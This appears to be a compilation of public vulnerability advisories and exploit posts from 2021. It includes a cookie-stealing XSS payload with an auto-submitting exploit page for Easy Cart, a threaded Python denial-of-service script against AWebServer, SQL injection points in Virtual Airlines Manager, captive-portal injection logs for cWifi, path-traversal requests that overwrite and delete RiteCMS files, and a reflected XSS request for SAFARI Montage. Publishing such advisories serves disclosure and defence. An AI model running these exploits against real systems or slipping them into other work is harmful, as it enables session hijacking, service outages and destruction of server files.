<pre><code>Document Title:<br />===============<br />Easy Cart Shopping Cart - (Search) Persistent Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2298<br /><br /><br />Release Date:<br />=============<br />2021-12-15<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2298<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.1<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Non Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />A mobile-friendly, SEO optimized and easy-to-install (with a free installation also offered also on request) PHP shopping<br />cart script that can be used to add an e-commerce functionality to existing sites or to create simple online stores.<br />Easy Cart is a PHP script allowing to create a simple shopping cart website or integrate a shopping cart functionality<br />in an existing site-the users will be able to browse the products, add them in the cart and check out and make a payment.<br /><br />(Copy of the Homepage:https://www.netartmedia.net/easy-cart )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a cross site scripting web vulnerability in the Easy Cart Shopping Cart PHP Script.<br /><br /><br />Affected Product(s):<br />====================<br />NetArt Media<br />Product: Easy Cart Shopping Cart (v2021) - CMS (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-09-01: Researcher Notification & Coordination (Security Researcher)<br />2021-09-02: Vendor Notification (Security Department)<br />2021-**-**: Vendor Response/Feedback (Security Department)<br />2021-**-**: Vendor Fix/Patch (Service Developer Team)<br />2021-**-**: Security Acknowledgements (Security Department)<br />2021-12-15: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Pre Auth (No Privileges or Session)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A non-persistent post inject web vulnerability has been discovered in the official Easy Cart Shopping Cart PHP Script.<br />The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user<br />session data or to manipulate application contents for clients.<br /><br />The cross site scripting web vulnerability is located in the `keyword_search` parameter of the `index search` module.<br />Remote attackers without privileged access are able to inject own malicious script code in the search input field of<br />the index module post method request. The execution takes place in the results page of the search after submit via post.<br /><br />Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent<br />external redirects to malicious source and non-persistent manipulation of affected application modules.<br /><br />Request method(s):<br />[+] POST<br /><br />Vulnerable Input(s):<br />[+] Search (index)<br /><br />Vulnerable Parameter(s):<br />[+] keyword_search<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The client-side post inject web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.<br />For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />PoC: Payload<br />>"<iframe src=evil.source onload=alert(document.cookie)><br /><br /><br />--- PoC Session Logs (POST) ---<br />https://easy-cart.localhost:8000/cart/index.php<br />Host: easy-cart.localhost:8000<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 228<br />Origin:https://easy-cart.localhost:8000<br />Connection: keep-alive<br />Referer:https://easy-cart.localhost:8000/cart/index.php<br />Cookie: PHPSESSID=24d238178bfb19f9bd93f25f1b465885<br />page=products&proceed_search=1&keyword_search=>"<iframe src=evil.source onload=alert(document.cookie)>&amount=$299 - $549&only_picture=0<br />-<br />POST: HTTP/2.0 200 OK<br />server: Apache<br />cache-control: no-store, no-cache, must-revalidate<br />pragma: no-cache<br />vary: Accept-Encoding<br />content-encoding: gzip<br />content-length: 2496<br />content-type: text/html; charset=UTF-8<br />-<br />https://easy-cart.localhost:8000/cart/evil.source<br />Host: easy-cart.localhost:8000<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Connection: keep-alive<br />Referer:https://easy-cart.localhost:8000/cart/index.php<br />Cookie: PHPSESSID=24d238178bfb19f9bd93f25f1b465885<br />-<br />GET: HTTP/2.0 200 OK<br />server: Apache<br />vary: Accept-Encoding<br />content-encoding: gzip<br />content-length: 703<br />content-type: text/html; charset=UTF-8<br /><br /><br /><br />PoC: Exploit<br /><html><br /><head><br /><title>PoC</title><br /><style type="text/css"><br />#nodisplay {<br />display:none;<br />}<br /></style><br /></head><br /><body><br /><div id="nodsiplay"><br /><form action="https://easy-cart.localhost:8000/cart/index.php" method="post"><br /><input type="text" name="keyword_search" value="><iframe src=evil.source onload=alert(document.cookie)>"/><br /></form><br /></div><br /><script><br />function submitForm() {<br />document.forms[0].submit();<br />}<br />submitForm();<br /></script><br /></body><br /></html><br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code># Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS)<br /># Date: 28/12/2021<br /># Exploit Author: Andres Ramos [Invertebrado]<br /># Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm<br /># Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en<br /># Version: AWebServer GhostBuilding 18<br /># Tested on: Android<br /><br />#!/usr/bin/python3<br /><br /># *********************************************************************************<br /># * Author: Andres Ramos [Invertebrado] *<br /># * AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash *<br /># *********************************************************************************<br /><br />import signal<br />import requests<br />from pwn import *<br /><br />#Colors<br />class colors():<br /> GREEN = "\033[0;32m\033[1m"<br /> END = "\033[0m"<br /> RED = "\033[0;31m\033[1m"<br /> BLUE = "\033[0;34m\033[1m"<br /> YELLOW = "\033[0;33m\033[1m"<br /> PURPLE = "\033[0;35m\033[1m"<br /> TURQUOISE = "\033[0;36m\033[1m"<br /> GRAY = "\033[0;37m\033[1m"<br /><br />exit = False<br /><br />def def_handler(sig, frame):<br /> print(colors.RED + "\n[!] Exiting..." + colors.END)<br /> exit = True<br /> sys.exit(0)<br /><br /> if threading.activeCount() > 1:<br /> os.system("tput cnorm")<br /> os._exit(getattr(os, "_exitcode", 0))<br /> else:<br /> os.system("tput cnorm")<br /> sys.exit(getattr(os, "_exitcode", 0))<br /><br />signal.signal(signal.SIGINT, def_handler)<br /><br />if len(sys.argv) < 3:<br /> print(colors.RED + "\n[!] Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END)<br /> sys.exit(1)<br /><br />url = sys.argv[1]<br />Tr = sys.argv[2]<br /><br />def http():<br /> counter = 0<br /> p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END)<br /> while True:<br /> r = requests.get(url)<br /> r = requests.get(url + "/mysqladmin")<br /> counter += 2<br /> p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END)<br /><br /> if exit:<br /> break<br /><br />if __name__ == '__main__':<br /><br /> threads = []<br /><br /> try:<br /> for i in range(0, int(Tr)):<br /> t = threading.Thread(target=http)<br /> threads.append(t)<br /><br /> sys.stderr = open("/dev/null", "w")<br /><br /> for x in threads:<br /> x.start()<br /><br /> for x in threads:<br /> x.join()<br /><br /> except Exception as e:<br /> log.failure(str(e))<br /> sys.exit(1)<br /> <br /></code></pre>
<pre><code># Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection<br /># Google Dork: Powered by Virtual Airlines Manager [v2.6.2]<br /># Date: 2021-12-30<br /># Exploit Author: Milad Karimi<br /># Vendor Homepage: http://virtualairlinesmanager.net<br /># Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/<br /># Version: 2.6.2<br /># Tested on: Ubuntu 19.04<br /><br />[1] Vulnerable GET parameter: notam_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]<br /><br />[2] Vulnerable GET parameter: airport=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]<br /><br />[3] Vulnerable GET parameter: registry_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]<br /><br />[4] Vulnerable GET parameter: plane_location=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]<br /><br />[5] Vulnerable GET parameter: hub_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]<br /><br />[6] Vulnerable GET parameter: pilot_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]<br /><br />[7] Vulnerable GET parameter: registry_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]<br /><br />[8] Vulnerable GET parameter: event_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]<br /><br />[9] Vulnerable GET parameter: tour_id=[SQLi]<br />[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]<br /></code></pre>
<pre><code>Document Title:<br />===============<br />cWifi Hotspot Wireless CP - Code Execution Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2310<br /><br /><br />Release Date:<br />=============<br />2021-12-15<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2310<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />8.2<br /><br /><br />Vulnerability Class:<br />====================<br />Code Execution<br /><br /><br />Current Estimated Price:<br />========================<br />2.000€ - 3.000€<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered code execution vulnerability in the cWifi Hotspot Wireless Captive Portal.<br /><br /><br />Affected Product(s):<br />====================<br />Product: cWifi Hotspot Wireless Captive Portal - (PHP) (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-12-15: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />High<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Guest Privileges)<br /><br /><br />User Interaction:<br />=================<br />No User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />A code execution vulnerability has been discovered in the official cWifi Hotspot wireless captive portal web-application.<br />The vulnerability is located in the login status post method request for the spot-cwifi. Remote attackers are able to inject own malicious ip and<br />mac adress credentials in the post method data request. that results in several different typ of vulnerabilities in connection to the phpsessionid.<br />Attackers are able to provoke client-side script code execution via mac or ip parameter in the status post method request. Thus allows the attacker<br />to gain access to the victims wifi connection and session credentials to access. The issue can be process by a full remote attacker after connecting<br />as guest or member to the wifi. The parameter in the post method request are no sanitized correctly and results in a client-side execution.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] /v2/<br />[+] /logout<br /><br />Vulnerable File(s):<br />[+] status.php<br /><br />Vulnerable Parameter(s):<br />[+] ip<br />[+] mac<br />[+] adress<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The critical code execution vulnerability can be exploited by remote attackers with guest access or by authenticated user accounts.<br />For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Vulnerable Source: status.php (v2/status.php -http://spot.cwifi.de/status)<br /></head><br /><body><br /><div class="container-fluid"><br /><br><br> <br /><div class="row"><br /><div class="col-md-4"></div><br /><div class="col-md-4"><br /><form data-ajax="false" action='/v2/status.php?PHPSESSID=06u1m6qlhcp4tbuuapnq8du5c7' method="post"><br /><p><span class="zwischenh1gelb gelb bold">MAC-Adresse: <[MALICIOUS INJECTED CODE EXECUTION!]></span></span><br /></span><br /><span class="bold">IP Adresse:</span><[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]></p><br /><p><span class="bold">Bytes up/down:</span>7.2 MiB/ 221.6 MiB</p><br /><p><span class="bold">Session time:</span>7m56s</p><br /><p><br><br /><button name="ABMELDEN" type="submit" class="btn btn-primary btn-lg btn-block">abmelden</button><br /><button name="DELETE" type="submit" class="btn btn-danger btn-lg btn-block">abmelden und Daten löschen</button><br /></p><br /></form><br /><div class="col-md-4"></div><br /></div> </div> <br /></body><br /></html><br />-- logout status<br /><td valign="middle" align="center"><br /><b>you have just logged out</b> <br><br><br /><table class="tabula" border="1"><br /><tbody><tr><td align="right">user name</td><td><[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]></td></tr><br /><tr><td align="right">IP address</td><td><[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]></td></tr><br /><tr><td align="right">MAC address</td><td><[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]></td></tr><br /><tr><td align="right">session time</td><td>4m12s</td></tr><br /><tr><td align="right">time left</td><td>23h55m48s</td></tr><br /><tr><td align="right">bytes up/down:</td><td>49.1 KiB / 169.2 KiB</td></tr><br /></tbody></table><br /><br><br /><form action="http://spot.cwifi.de/login" name="login" onsubmit="return openLogin()"><br /><input type="submit" value="log in"><br /></form><br /></td><br /><br /><br />--- PoC Session Logs (POST) ---<br />POST /v2/status.php HTTP/1.1<br />Host: hotspot.cwifi.de<br />Content-Length: 1129<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin:http://spot.cwifi.de<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: cross-site<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: document<br />Referer:http://spot.cwifi.de/<br />Accept-Encoding: gzip, deflate<br />Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br />-<br />hostname=spot.cwifi.de&identity=Client2822&login-by=http-pap&plain-passwd=yes&server-address=<[MALICIOUS INJECTED CODE!]>%3A80&ssl-login=no<br />&server-name=Client2822_HotSpot&link-login=http%3A%2F%2Fspot.cwifi.de%2Flogin&link-login-only=http%3A%2F%2Fspot.cwifi.de%2Flogin<br />&link-logout=http%3A%2F%2Fspot.cwifi.de%2Flogout&link-status=http%3A%2F%2Fspot.cwifi.de%2Fstatus&link-orig=<br />&domain=&interface-name=2_HotSpotA&ip=<[MALICIOUS INJECTED CODE!]>&logged-in=yes&mac=<[MALICIOUS INJECTED CODE!]>&trial=no&username=90%3ACC%3ADF%3A96%3AF6%3A59<br />&host-ip=<[MALICIOUS INJECTED CODE!]>&idle-timeout=5h&idle-timeout-secs=18000&limit-bytes-in=&limit-bytes-out=&refresh-timeout=1m&refresh-timeout-secs=60<br />&session-timeout=23h52m4s&session-timeout-secs=85924&session-time-left=23h52m4s&session-time-left-secs=85924&uptime=7m56s&uptime-secs=476<br />&bytes-in=7591511&bytes-in-nice=7.2+MiB&bytes-out=232391459&bytes-out-nice=221.6+MiB&packets-in=154484&packets-out=172963&remain-bytes-in=<br />&remain-bytes-out=&session-id=&var=&error=&error-orig=&chap-id=%24%28chap-id%29&chap-challenge=%24%28chap-challenge%29&popup=%24%28popup%29<br />&advert-pending=no&http-status=%24%28http-status%29&http-header=%24%28http-header%29<br />-<br />HTTP/1.1 200 OK<br />Server: Apache/2.4.18 (Ubuntu)<br />Set-Cookie: PHPSESSID=06u1m6qlhcp4tbuuapnq8du5c7; path=/<br />Cache-Control: no-store, no-cache, must-revalidate<br />Vary: Accept-Encoding<br />Content-Length: 2137<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />-- via Login<br />https://hotspot.cwifi.de/v2/login.php<br />Host: hotspot.cwifi.de<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 1078<br />Origin:http://spot.cwifi.de<br />Connection: keep-alive<br />Referer:http://spot.cwifi.de/<br />Cookie: PHPSESSID=tvpvp06jktbs8hvgm8efh1eh33<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: cross-site<br />phone=&hostname=spot.cwifi.de&identity=Client2822&login-by=&plain-passwd=yes&server-address=<[MALICIOUS INJECTED CODE!]>:80&ssl-login=no&server-name=Client2822_HotSpot<br />&link-login=http://spot.cwifi.de/login&link-login-only=http://spot.cwifi.de/login&link-logout=http://spot.cwifi.de/logout&link-status=http://spot.cwifi.de/status<br />&link-orig=&domain=&interface-name=2_HotSpotA&ip=<[MALICIOUS INJECTED CODE!]>&logged-in=no&mac=<[MALICIOUS INJECTED CODE!]>&trial=no&username=<br />&host-ip=<[MALICIOUS INJECTED CODE!]>&idle-timeout=&idle-timeout-secs=0<br />&limit-bytes-in=&limit-bytes-out=&refresh-timeout=&refresh-timeout-secs=0&session-timeout=&session-timeout-secs=0&session-time-left=&session-time-left-secs=0<br />&uptime=0s&uptime-secs=0&bytes-in=0&bytes-in-nice=0 B&bytes-out=0&bytes-out-nice=0 B&packets-in=0&packets-out=0&remain-bytes-in=&remain-bytes-out=&session-id=<br />&var=&error=&error-orig=&chap-id=244&chap-challenge=2765623021030016220234114113331227527435520051<br />&popup=true&advert-pending=no&http-status=$(http-status)&http-header=$(http-header)<br />-<br />POST: HTTP/1.1 200 OK<br />Server: Apache/2.4.18 (Ubuntu)<br />Cache-Control: no-store, no-cache, must-revalidate<br />Vary: Accept-Encoding<br />Content-Encoding: gzip<br />Content-Length: 334<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />Content-Type: text/html; charset=UTF-8<br /><br /><br />Security Risk:<br />==============<br />The security risk of the code execution web vulnerability that allows to attack by multiple vectors to compromise the wifi is estimated as high.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [admin@vulnerability-lab.com] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code># Exploit Title: RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)<br /># Date: 25/07/2021<br /># Exploit Author: faisalfs10x (https://github.com/faisalfs10x)<br /># Vendor Homepage: https://ritecms.com/<br /># Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip<br /># Version: <= 3.1.0<br /># Google Dork: intext:"Powered by RiteCMS"<br /># Tested on: Windows 10, Ubuntu 18, XAMPP<br /># Reference: https://gist.github.com/faisalfs10x/4a3b76f666ff4c0443e104c3baefb91b<br /><br /><br />################<br /># Description #<br />################<br /><br /># RiteCMS version 3.1.0 and below suffers from an arbitrary file overwrite vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to write). Furthermore, an attacker might leverage the capability of arbitrary file overwrite to modify existing file such as /etc/passwd or /etc/shadow if the current PHP process user is run as root.<br /><br /><br />############################################################<br /># PoC to overwrite existing index.php to display phpinfo() #<br />############################################################<br /><br /><br />Steps to Reproduce:<br /><br />1. Login as admin<br />2. Go to File Manager<br />3. Then, click Upload file > Browse.. <br />4. Upload any file and click checkbox name "overwrite file with same name"<br />4. Intercept the request and replace current file name to any files path on the server via parameter "file_name".<br /><br /><br />PoC: param file_name - to overwrite index.php to display phpinfo, so the payload will be "../index.php"<br /> param filename - with the content of "<?php phpinfo(); ?>"<br /><br />Request:<br />========<br /><br />POST /ritecmsv3.1.0/admin.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------351719865731412638493510448298<br />Content-Length: 1840<br />Origin: http://localhost<br />DNT: 1<br />Connection: close<br />Referer: http://192.168.8.143/ritecmsv3.1.0/admin.php?mode=filemanager&action=upload&directory=media<br />Cookie: PHPSESSID=nuevl0lgkrc3dv44g3vgkoqqre<br />Upgrade-Insecure-Requests: 1<br />Sec-GPC: 1<br /><br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="mode"<br /><br />filemanager<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="file"; filename="anyfile.txt"<br />Content-Type: application/octet-stream<br /><br />content of the file to overwrite here<br />-- this is example to overwrite index.php to display phpinfo --<br /><?php phpinfo(); ?><br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="directory"<br /><br />media<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="file_name"<br /><br />../index.php<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="overwrite_file"<br /><br />true<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="upload_mode"<br /><br />1<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="resize_xy"<br /><br />x<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="resize"<br /><br />640<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="compression"<br /><br />80<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="thumbnail_resize_xy"<br /><br />x<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="thumbnail_resize"<br /><br />150<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="thumbnail_compression"<br /><br />70<br />-----------------------------351719865731412638493510448298<br />Content-Disposition: form-data; name="upload_file_submit"<br /><br />OK - Upload file<br />-----------------------------351719865731412638493510448298--<br /></code></pre>
<pre><code># Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)<br /># Date: 25/07/2021<br /># Exploit Author: faisalfs10x (https://github.com/faisalfs10x)<br /># Vendor Homepage: https://ritecms.com/<br /># Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip<br /># Version: <= 3.1.0<br /># Google Dork: intext:"Powered by RiteCMS"<br /># Tested on: Windows 10, Ubuntu 18, XAMPP<br /># Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd<br /><br /><br />################<br /># Description #<br />################<br /><br /># RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.<br /><br /><br />#####################################################<br /># PoC to delete secretConfig.conf file in web root #<br />#####################################################<br /><br /><br />Steps to Reproduce:<br /><br />1. Login as admin<br />2. Go to File Manager<br />3. Delete any file<br />4. Intercept the request and replace current file name to any files on the server via parameter "delete".<br /><br /># Assumed there is a secretConfig.conf file in web root<br /><br />PoC: param delete - Deleting secretConfig.conf file in web root, so the payload will be "../secretConfig.conf"<br /><br />Request:<br />========<br /><br />GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: close<br />Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager<br />Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Sec-GPC: 1<br /><br /></code></pre>
<pre><code># Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)<br /># Date: 28/12/2021<br /># Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc)<br /># Vendor Homepage: https://www.safarimontage.com/<br /># Version: 8.3 and 8.5<br /># Tested on: Ubuntu Linux [Firefox]<br /># CVE: CVE-2021-45425<br /><br /># Proof of Concept:<br /><br />GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1<br />Host: vulnIP<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=SSSION; lang=en<br />Connection: close<br /><br /></code></pre>
